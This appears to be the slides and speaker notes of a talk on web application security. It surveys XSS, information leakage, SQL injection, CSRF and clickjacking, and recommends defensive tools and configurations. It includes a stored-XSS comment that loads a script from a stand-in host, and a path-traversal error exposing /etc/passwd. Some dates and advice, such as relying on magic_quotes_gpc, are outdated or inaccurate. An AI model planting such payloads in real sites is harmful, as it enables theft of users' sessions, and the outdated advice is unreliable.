good evening!!my name is Sam. I'm from Armenia. It's in the Middle Asia. I've been working as a Web Developer & Web Security Analytic for past 4 years and tonight I'm going to present the best practices of web application security.
This is the statistic of risk levels for the last 3 years and as we see the high level vulnerabilities've been grown up in 2010.
TOP 10 HIGH LEVEL VULNERABILITIES01. Cross-Site Scripting (XSS) [Symantec - 2007]
02. Information leakage
03. SQL Injection [~2005]
04. Cross-Site Request Forgery (CSRF) [1990s]
05. ClickJacking [J.Grossman and R.Hansen - 2008]
06. Phishing [1987, 1996]
07. Path Traversal or Local/Remote File Inclusion
08. Shell injection
09. Session Hijacking [early 2000s]
10. File uploads
S.A.M
The top 10 high level vulnerabilities are:1. Cross-Site Scripting which has been found by Symantec on 2007.....
CROSS-SITE SCRIPTING
• DESCRIPTION:Cross-Site Scripting is a type of web application vulnerability when the attacker injects his executable code into the vulnerable website.
so, you may ask why attacker needs this, if he can just simply write "javascript:alert('XSS');" instead of this in his browser's url address and get the same result....because he doesn't want to execute that in his browser..the evil code should be executed in victim's browser...
S.A.M
Cross-site Scripting is when the attacker executes his own executable code in the webpage. It may be front-end script(HTML, Javascript, etc.) depending on what attacker's trying to do.
CROSS-SITE SCRIPTING
• TYPES:1. Non-Persistant2. Persistant
1.Non-Persistant:In this type of XSS vulnerability the attacker is able to execute his own code in a website but no changes can be done in that website.
S.A.M
there are two type of XSS:1) Non-persistant2) Persistant..let's see the difference between them....
S.A.M
Non-persistent is when attacker executes his code in the webpage but no changes can be done in that website..
..suppose there is an ineresting topic in a website and it has xss flaw in it..so attacker can send these kind of link to a victim saing that he wants to share an interesting topic that he found in internet..most of all to steal victim's cookies..
CROSS-SITE SCRIPTING2.Persistant:
In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing that data.
Common targets are:• Comments• Chat messages• E-mail messages• Wall posts, etc.
S.A.M
The one is differet than the old one as in this case attaker stores his code into the website database which is being executed every time webpage is showing that data..so the common tagets are comments, chat messages, email messages, wall posts, etc.
CROSS-SITE SCRIPTINGPersistantEXAMPLE:
S.A.M
Here you see an example of persistant type...you may think that there is no difference between these two comments at first look.so let's look at the raw format of the attacker's comment...
CROSS-SITE SCRIPTINGPersistant
Comment in raw format:and I like the way this website developerswork..hahaha :D :D
<SCRIPT/XSS SRC="http://bad.com/xss.js"></SCRIPT>
S.A.M
so, now you see that there is a javascript code in this comment which you can see only viewing the source code of that webpage.in that javascript file may be anything....
CROSS-SITE SCRIPTINGPotentially Dangerous HTML elemets:
•Onmouseover•Onmousemove•Onmove•Onresize•Onselectstart•Onselect•Onsubmit•Onunload•Onscroll, etc.
*all HTML events
S.A.M
and also potentially dangerous HTML events... and all of theme may be used by attacker to implement an attack.
CROSS-SITE SCRIPTINGSOLUTIONS:• PHP function strip_tags()• PHP Input Filter• PHP libraries:•HTML_Safe• htmLawed• kses• Safe HTML Checker, etc.
S.A.M
so, let's see what are the solutions..you may use php functions like strip_tags() or filter_var() to filter the input or using famous php libraries to do that..
BEST SOLUTION
OWASP HTML Purifier:• SAFE
HTML Purifier defeats XSS with an audited whitelist
• OPENHTML Purifier is open-source and highly customizable
S.A.M
but the best solution is OWASP HTML Purifier. Which is Safe, Clean and Open
BEST SOLUTION
COMPARISON:
Source: www.htmlpurifier.org/comparison
S.A.M
here you see the difference between these functions and libraries and only HTML Purifier has all these features
BEST SOLUTION
COMPARISON:
Source: www.htmlpurifier.org/comparison
INFORMATION LEAKAGE
• DESCRIPTION:Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.
• EXAMPLE:Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20
S.A.M
..you know that information is the most expensive thing in the world so sensetive data must be secured..Information Leakage is when application reveals sensetive data which can be useful for the attacker.e.g: system information, system paths, application configurations, etc.
S.A.M
here is an axample of information leakage which can cous of local file inclusion attack.
INFORMATION LEAKAGE• COUSES OF:
1. Directory listening misconfiguration2. Unproper error handling3. Unproper filetype handling4. Sensitive HTML comments, etc.
1.Directory listening misconfiguration:Leaving directory listening enabled allows the attacker to read the list of all files in a directory.
S.A.M
it couses of directory listening misconfiguration, unproper error handling, unproper filetype handling, sensetive HTML comments, etc.
S.A.M
for example leaving directory listening configuration enabled allows attacker to read the content of that directory and list all the files there.
INFORMATION LEAKAGE
• EXAMPLE:Index of /admin
Directory listening misconfiguration
S.A.M
here is an axample of directory listing.so how it looks like. this is the /admin directory whick contains the followin files and folders.
INFORMATION LEAKAGE2.Unproper error handling:
Because of unproper error handling all the unexpecting requests will generate error messages which will be visible to the attacker.
• EXAMPLE:Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81
S.A.M
due to unexpecting requests web server responses error messages which can be important for the attacker to use SQLi, LFI, etc.
S.A.M
here is how mysql server responses due to unexpecting request..this is just an example..
INFORMATION LEAKAGE3.Unproper filetype handling:
Unproper filetype handling allows your important files to be readable by the attacker.
this problem accours when you store an important file in your public web directory which may be read by the attacker.some people think that only files linked from the website are accessible, but that's not true...
S.A.M
here are some example of important files than may content lot's of useful information for the attacker:some backups of your database or website, etc.
most of the web applications have configuration files and if those filetypes are not configured in the web server to use a sertain compiler it will show the raw code.
INFORMATION LEAKAGE4. Sensitive HTML comments :
Notes left by web developers may content important information which will cause of the information leakage.
• EXAMPLE:<form enctype="multipart/form-data" action="upload.php" method="POST"><!--check for filetypes php, cgi, pl, bat, exe, dll, reg--><input name="upload_file" type="file" /> …
S.A.M
almost all developers use to leave comments in their projects. That helps them to manage their application after a long time. And if those comments contain some information attakcer should not know, than this is an information leakage.
S.A.M
here you see an example.this information may be used by the attacker to know the exact filetypes that in black list.
BEST SOLUTION
Directory listening misconfigurationA. put a blank file named index.html in that
directory.B. put a file named .htaccess in that directory
consisting of only this line:Options –indexesNOTE: all sub-directories of that directory will also get their directory listings turned off.
S.A.M
so what is the best solution to protect you web application.a. you may put blank files named index.html, index.htm, index.php, etc. into the all your web directories.b. if you don't have access to your web server's configuration files you can just simply put an .htaccess file into your directory with the folowwing line of code. But you must note that then all the subdirectories will have the same, directory listening disabled, configuration.
BEST SOLUTION
Unproper error handlingA. The following configurations should be done in
this is one of the most important rules web developers should follow.the following configuration must be done in the php.ini file:1. error_reporting = E_ALLmeans all errors will be generated2. display_errors = Offmeans no errors will shown in the screen3. log_erros = Onall errors will be recorded in a single file4. error_log = path/PHP_erros.logthis is the file which will content all those records
BEST SOLUTION
Unproper error handlingB. Create an .htaccess file in public_html directory
with the following lines:php_flag display_errors offphp_flag log_errors onphp_value error_log path/PHP_errors.log<Files path/PHP_errors.log>Order allow,denyDeny from allSatisfy All</Files
S.A.M
if you don't have access to the php.ini php configuration file, you may create an .htaccess file in public_html directory with the wollowing lines of code
BEST SOLUTION
Unproper filetype handlingA. Don’t keep your important files with the
following extentions in your public web directory if you don’t link to them in the website:• Compressed files(*.zip, *.rar, *.tar.gz, etc.)• Database files(*.sql, *.cvs, *.xml, *.xls, etc.)• Unknown files(*.inc, *.copy, *.bkp, etc.)
S.A.M
best solution for this is not to keep your inportant files in your public web directory if you don't link to them in your website. Those files may be compressed files, database files or any other files that have unknown filetype.
BEST SOLUTION
Sensitive HTML commentsA. No sensetive HTML comment must be used in a
website as every user will be able to view the webpage source code.
S.A.M
there is no need to leave any important notes using HTML comments in your webpages. Those comments are readable by anyone.
SQL INJECTION
• DESCRIPTION:This is a type of vulnerability when attacker injects his custom SQL query to the request to get sensetive data from the database, read or write a file.
SQL Injection is when attacker injects his custom SQL commands to the request to get sensetive data from the database, read local files and/or write a file in the web server if mysql user has that kind of prevelages.
S.A.M
here is an axample of that which will output the database name in the screen.
SQL INJECTION
• TYPES:1. Normal2. Blind
1.Normal:In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen.
S.A.M
There are two kind of SQL Injection:1. Normal2. Blind
S.A.M
Normal SQL Injection is when attacker gets the output from the database in the screen.
the difference wetween these two types is that sometimes attacker doesn't get any output in his screen and the only thing query returns is positive or negative response. So the attacker must guess what is the database version, etc.
S.A.M
in this example attacker gets a positive responce if the database version is 5.
• Put variables into the quotes(e.g: ‘$id’)• Assign min privilages for mysql users
SOLUTIONS:
S.A.M
to prevent this kind of attacks you must follow these steps:1. you must set magic_quotes_gpc = On which will specal characters such as single or dubble quotes.2. you must use special php functions such as filter_var, mysql_real_escape_string and sprintf.3. variables must be put into the quotes.4. for each mysql user must be assigned minimum privilages. if user is responsible only to get some data from the dataase then his privilages must be SELECT only.
BEST SOLUTION
GreenSQL open source database firewall:• Activity monitoring and audit• User rights management• Real-time database protection• Intrusion preventation(IPS)• Database caching• Encrypted comunication over SSL• Virtual patching• Reporting
S.A.M
the best solution is using database firewall like GreenSQL which has the folllowing features...
BEST SOLUTION
GreenSQL open source database firewall:
S.A.M
here is how it works...it's a wall between alll incoming and outgoing SQL queries.
CROSS-SITE REQUEST FORGERY
• DESCRIPTION:This vulnerability of web application allows attacker’s website to manipulate its actions using authorized user’s session.
this is a vulnerability which allows attacker's website to send request using the victim's session that is active on that time.
S.A.M
here is an example..victim is logging into his account at site.com and then opens a new tab to read some interesting topics, news in bad.com.The following piece of code that is in attacker's website will send a request which will share it's url address in victin's post.
some people may think using post request insted of get requests will fix this problem, but that's not a solution. And the following code may be used to bypass that...
CROSS-SITE REQUEST FORGERY• USELESS DEFANCES:• Only accept POSTStops simple link-based attacks (IMG, frames, etc.)But hidden POST requests can be created with frames, scripts, etc.• Referer checkingSome users prohibit referers, so you can’t just require referer headersTechniques to selectively create HTTP request without referers exist• Requiring multi-step transactionsCSRF attack can perform each step in order
S.A.M
so, let's see what kind of defances are useless...using only post methods will not protect your application as you've just seen it.checking the refferer of the sender is not a solution, because there are lots of ways to change the refferer.using multi-step transection is not a good idea, beacuse there may be a clever code which will perform each task step by step.
• CAPTHCAsThis is a type of challenge-response test used in computing to ensure that the response is not generated by a computer.• One-time tokensUnlike the CAPTCHA’s system this is a unique number stored in the form field and in session to compare them after submiting the form.
SOLUTIONS:
CROSS-SITE REQUEST FORGERY
S.A.M
there are two solutions:first is two use captcha images and second to use one-time tokens...captchas are more secure than on-time token's, but they are borring so you must use them only in most important forms.
BEST SOLUTION
OWASP CSRFGuard
Add Tokento HTML
User(Browser)
Business Processing
OWASPCSRFGuard
Verify Token
1. Add token with regex
2. Add token with HTML parser
3. Add token in browser with
Javascript
• Adds token to:– href attribute– src attribute– hidden field in all forms
• Actions:– Log– Invalidate– Redirect
Source: www.owasp.org/index.php/CSRFGuard
S.A.M
the best solution provides OWASP CSRFGuard..here is how it works....it doesn't allow to use some brute force systems to verify tokens and it creates strong tokens which are hard too guess.
CLICK-JACKING
• DESCRIPTION:This is the advanced version of Cross-Site Request Forgery. It uses all the flexibility of front-end languages to bypass protected forms and send a request using victim’s active session.
this is advanced version of Cross-site Request Forgery. Principle is the same but in this case ClickJacking is using all the flexibilitiy of the front-end languages to open the form in iframe element, steal the one-time token and act like victim(logged user)
S.A.M
in this example there is a transparent div element in the front of the attacker's webpage and the evil code acts when user clicks on any side of the webpage...
CLICK-JACKINGEXAMPLE:
S.A.M
so, in this example there is a hidden div element in front of the attacker's webpage which holds an iframe with twitter webpage. That div element is being moved with mouse cursor so that the submit button was under cursor. Whenever victim clicks on any side of that webpage the form in twitter webpage is submitted.
FrameKillers..this is a small piece of javascript code which don't allow prevents other website to include it's webpage.so FrameKiller will protect your website against frames/ifames and OWASP CSRFGuard will protect your forms.
![CARTOON BY: JBOSCO AZEVEDO [BRAZIL] · tina), Arsen Gevorgyan (Armenia), Luc Descheemaeker (Belgium), Marcelo Rampazzo ... (Costa Rica), Vicky Ramos (Costa Rica), Jorge Martinez (Cuba),](https://img.pdfslide.us/doc/110x75/5bbec6de09d3f208478c9681/cartoon-by-jbosco-azevedo-brazil-tina-arsen-gevorgyan-armenia-luc-descheemaeker.jpg)
